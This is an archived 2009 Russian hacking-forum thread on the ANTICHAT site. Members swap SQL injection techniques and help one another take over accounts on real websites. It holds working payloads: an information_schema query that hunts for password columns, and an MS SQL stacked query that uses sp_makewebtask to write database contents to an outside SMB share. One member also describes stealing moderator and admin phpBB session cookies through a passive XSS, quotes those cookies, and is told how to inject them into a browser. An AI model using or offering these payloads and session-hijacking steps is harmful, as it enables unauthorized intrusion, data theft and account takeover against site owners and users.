HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.10.2009, 21:12
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

order by $script limit 0,50:
Цитата:
&script=post+order+by+1
=>near 'order by 1 limit 0,50'
Цитата:
&script=post1
=>Unknown column 'post1 in 'order clause'
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
https://forum.antichat.ru/threadnav35207-1-10.html
 
Ответить с цитированием

  #2  
Старый 03.10.2009, 12:00
Train
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619

Репутация: 10
По умолчанию

Цитата:
Сообщение от l1ght  
order by $script limit 0,50:

=>near 'order by 1 limit 0,50'

=>Unknown column 'post1 in 'order clause'
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
https://forum.antichat.ru/threadnav35207-1-10.html
Смотри пункт 3.4 на http://forum.xaknet.ru/thread4556.html
Лично мне такое еще не попадалось.
 
Ответить с цитированием

  #3  
Старый 02.10.2009, 00:22
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию

Помогите плиз сформировать запрос по этому:
Цитата:
select id,DATE_FORMAT(date,'%d.%m.%Y') as date,toString,name,answer from _sa_prefix_database_guestbook where visible and published and exist and parent='172' order by position desc limit -40,10
А то, что-то не выходит сделать вывод печатного поля ((
 
Ответить с цитированием

  #4  
Старый 02.10.2009, 13:15
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

такой вопрос, имею слепую, знаю колонки , какой составить запрос что бы искать посимвольно имя таблицу в которой есть колока к примеру pass??



ЗЫ ElteRUS От тебя жду ответа =)

Последний раз редактировалось HAXTA4OK; 02.10.2009 в 13:26..
 
Ответить с цитированием

  #5  
Старый 02.10.2009, 13:27
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

...(select table_name from information_schema.columns where column_name like 0x257061737325 limit 0,1)...
 
Ответить с цитированием

  #6  
Старый 02.10.2009, 20:26
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Есть инъекция в MS SQL
Но отключен вывод ошибок

Что можно сделать?
Може как-то как в MySQL с union select 1,2,3,4?

Последний раз редактировалось Byrger; 02.10.2009 в 23:29..
 
Ответить с цитированием

  #7  
Старый 03.10.2009, 12:05
Train
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619

Репутация: 10
По умолчанию

Цитата:
Сообщение от Byrger  
Есть инъекция в MS SQL
Но отключен вывод ошибок

Что можно сделать?
Може как-то как в MySQL с union select 1,2,3,4?
Что-то мне сегодня захотелось сделать что-нибудь полезное
Можно использовать sp_makewebtask, чтобы записать ваш запрос в HTML:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

Указываемый IP должен иметь папку "share" с доступом для Everyone.

Хотя помнится я как-то и с union select развлекался, правда в postgres sql но погоды это не делает, ибо что в постгрис что в мсскл нужно чтобы типы всех параметров совпадали, так что не компостируй себе мозГ, читай http://www.securitylab.ru/analytics/216211.php
 
Ответить с цитированием

  #8  
Старый 03.10.2009, 12:50
Roston
Постоянный
Регистрация: 31.07.2008
Сообщений: 370
Провел на форуме:
2866942

Репутация: 350
По умолчанию

здрасте всем... нашёл пасивку на одном ресурсе... суть такова, стоит самописный сайт и пхпбб. дело в том что юзеры на сайте и на форуме логинятся под одним ником, кукисы такие как у пхпбб. дело в том что смог угнать модера
куки у него вот такого вида
Код:
iua=1; b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; ; phpbb2mysql_sid=dc4b2038e838e83c1789c49dc4960b4d
Потом смог же заманить на пасивку и админа но у него в куках присутствует еше какое то поле
Код:
; phpbb2mysql_sid=6c5ea6d3269f4ba89585ecb7547090db; phpbb2mysql_t=a:2:{i:12062;i:1254481197;i:12078;i:1254507094;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";i:-1;}; iua=1; b=b
Вот вопрос, как мне в опере или в другом браузере добавить такое поле? в опере на сколько я понял можно менять существующие поля, но новые создавать нельзя...
з.ы. пробовал переименововать поле b но ничего не получалось, после обновления страницы я становился неавторизованым
 
Ответить с цитированием

  #9  
Старый 03.10.2009, 13:01
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию

у Fire Fox есть такой плагин - cookie editor называется. Вот там и добавляется все спокойно

https://addons.mozilla.org/en-US/firefox/addon/573
 
Ответить с цитированием

  #10  
Старый 03.10.2009, 14:13
brodobra
Новичок
Регистрация: 03.10.2009
Сообщений: 1
Провел на форуме:
691

Репутация: 5
По умолчанию

Есть ли прога, которая из имеющегося текстового списка брала слова, вставляла бы их в окошко клиента (чат, к примеру) и нажимала/кликала Ввод ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.